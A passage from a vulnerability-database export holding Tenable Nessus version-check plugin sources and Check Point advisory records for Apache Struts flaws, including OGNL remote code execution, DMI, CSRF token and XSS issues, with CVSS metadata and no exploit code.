70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117391);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-4310\");\n 
script_bugtraq_id(62584);\n\n script_name(english:\"Apache Struts 2.x < 2.3.15.3 Broken Access Control Vulnerability (S2-018)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a broken access control vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.15.3. It, therefore, is affected by a broken access\ncontrol vulnerability which can be used to bypass security constraints.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-018\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.15.3 or later or follow the\nvendors instructions to disable DMI.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4310\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.15.2\", \"fixed_version\" : \"2.3.15.3\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-16T15:01:13", "description": "The version of Apache Struts installed on the remote host is 2.x prior to 2.5.26. It is, therefore, affected by a remote code execution vulnerability in its OGNL evaluation functionality due to insufficient validation of user input. 
An unauthenticated, remote attacker can exploit this to execute arbitrary commands on an affected host.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.5.26 RCE (S2-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2023-06-16T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_26.NASL", "href": "https://www.tenable.com/plugins/nessus/143599", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143599);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/16\");\n\n script_cve_id(\"CVE-2020-17530\");\n script_xref(name:\"IAVA\", value:\"2020-A-0565-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Struts 2.x < 2.5.26 RCE (S2-061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior to 2.5.26. It is, therefore, affected by a \na remote code execution vulnerability in its OGNL evaluation functionality due to insufficient validation of user \ninput. 
An unauthenticated, remote attacker can exploit this to execute arbitrary commands on an affected host.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.26 or later. Alternatively, apply the workarounds as referenced in the vendor \n security bulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nos = get_kb_item_or_exit('Host/OS');\nwin_local = 'windows' >< tolower(os);\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{'min_version':'2.0.0', 'fixed_version':'2.5.26'}];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:11", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by multiple unspecified vulnerabilities related to dynamic method invocation (DMI) in the bundled version of Apache Struts.", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.0.x < 3.0.5 Apache Struts DMI Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4316"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts"], "id": "MYSQL_ENTERPRISE_MONITOR_3_0_5.NASL", "href": "https://www.tenable.com/plugins/nessus/83297", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83297);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-4316\");\n script_bugtraq_id(62587);\n\n script_name(english:\"MySQL Enterprise Monitor 3.0.x < 3.0.5 Apache Struts DMI Multiple Vulnerabilities\");\n 
script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by multiple unspecified\nvulnerabilities related to dynamic method invocation (DMI) in the\nbundled version of Apache Struts.\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17c46362\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-019.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 3.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"3.0.5\";\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (version =~ \"^3\\.0($|[^0-9])\" && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-13T16:02:28", "description": "The version of Apache Struts installed on the remote host is prior to 2.5.26. It is, therefore, affected by a vulnerability as referenced in the S2-061 advisory.\n\n - Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. 
(CVE-2020-17530)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-06T00:00:00", "type": "nessus", "title": "Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2023-08-09T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_S2-061.NASL", "href": "https://www.tenable.com/plugins/nessus/151425", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151425);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/09\");\n\n script_cve_id(\"CVE-2020-17530\");\n script_xref(name:\"IAVA\", value:\"2020-A-0565-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by Possible Remote Code Execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is prior to 2.5.26. It is, therefore, affected by a\nvulnerability as referenced in the S2-061 advisory.\n\n - Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code\n execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. 
(CVE-2020-17530)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.26 or later. Alternatively, apply the workaround as referenced in in the vendor's\nsecurity bulletin\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar os = get_kb_item_or_exit('Host/OS');\nvar win_local = ('windows' >< tolower(os));\n\nvar app_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.25', 'fixed_version' : '2.5.26' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:45", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host may be affected by a cross-site request forgery vulnerability due to the token generator failing to adequately randomize the token values. A remote attacker can exploit this by extracting a token from a form and then predicting the next token value that will be used to secure form submissions. 
By convincing a victim to visit a specially crafted form, the attacker can then use the predicted token value to force an action for a logged in user.\n\nNote that this vulnerability can only be exploited when the <s:token/> tag is used within a form.", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor < 2.3.20 Apache Struts Predictable Token XSRF", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7809"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts"], "id": "MYSQL_ENTERPRISE_MONITOR_2_3_20.NASL", "href": "https://www.tenable.com/plugins/nessus/83294", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83294);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7809\");\n script_bugtraq_id(71548);\n\n script_name(english:\"MySQL Enterprise Monitor < 2.3.20 Apache Struts Predictable Token XSRF\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a\ncross-site request forgery vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host may be affected by a cross-site request\nforgery vulnerability due to the token generator failing to adequately\nrandomize the token values. A remote attacker can exploit this by\nextracting a token from a form and then predicting the next token\nvalue that will be used to secure form submissions. 
By convincing a\nvictim to visit a specially crafted form, the attacker can then use\nthe predicted token value to force an action for a logged in user.\n\nNote that this vulnerability can only be exploited when the <s:token/>\ntag is used within a form.\");\n # http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56618dc1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-023.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/WW-4423\");\n\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MySQL Enterprise Monitor 2.3.20 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"2.3.20\";\nport = get_http_port(default:18080);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:54:03", "description": "A security bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by ParametersInterceptor allowing for manipulation of the ClassLoader. 
A remote attacker could exploit this vulnerability by providing a class parameter in a request.", "cvss3": {}, "published": "2014-04-25T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094; CVE-2014-0112; CVE-2014-0113; CVE-2014-0114)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0114"], "modified": "2019-06-04T00:00:00", "id": "CPAI-2014-1480", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T12:14:33", "description": "The url/a tags resolve every parameter passed to them, allowing arbitrary OGNL expressions encoded into the URL to be evaluated bypassing both Struts and OGNL library protections. 
Successful exploitation will allow an attacker to execute arbitrary commands in the context of the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-06-04T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts URL and Anchor tag includeParams OGNL Command Execution (CVE-2013-1966; CVE-2013-2115)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2015-11-03T00:00:00", "id": "CPAI-2013-1859", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:33:31", "description": "A remote code execution vulnerability exists in the Apache Struts2 using Freemarker template engine. An attacker could exploit this vulnerability by sending crafted requests to the target host. 
Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-08T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Freemarker Remote Code Execution (CVE-2017-12611)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2017-09-08T00:00:00", "id": "CPAI-2017-0747", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:27:26", "description": "A remote code execution vulnerability exists in Apache. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-15T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Freemarker Remote Code Execution (CVE-2017-12611) - Ver2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2018-07-31T00:00:00", "id": "CPAI-2018-0779", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T12:16:13", "description": "A Cross-Site Scripting vulnerability has been reported in Apache Struts. The vulnerabilities are due to unsanitized parameters in various automatically generated error pages. A remote attacker can exploit these vulnerabilities by enticing a victim to follow a specially crafted link. 
Successful exploitation could result in attacker-controlled script execution in the browser context of the target server.", "cvss3": {}, "published": "2013-10-13T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts XWork Error Page Multiple Cross-Site Scripting (CVE-2011-1772)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1772"], "modified": "2013-10-13T00:00:00", "id": "CPAI-2013-2969", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-02-16T19:36:00", "description": "A remote code execution vulnerability exists in Apache Struts. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-21T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Code Execution (CVE-2020-17530)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-21T00:00:00", "id": "CPAI-2020-1331", "href": "", "cvss": {"score": 7.5, "vector": 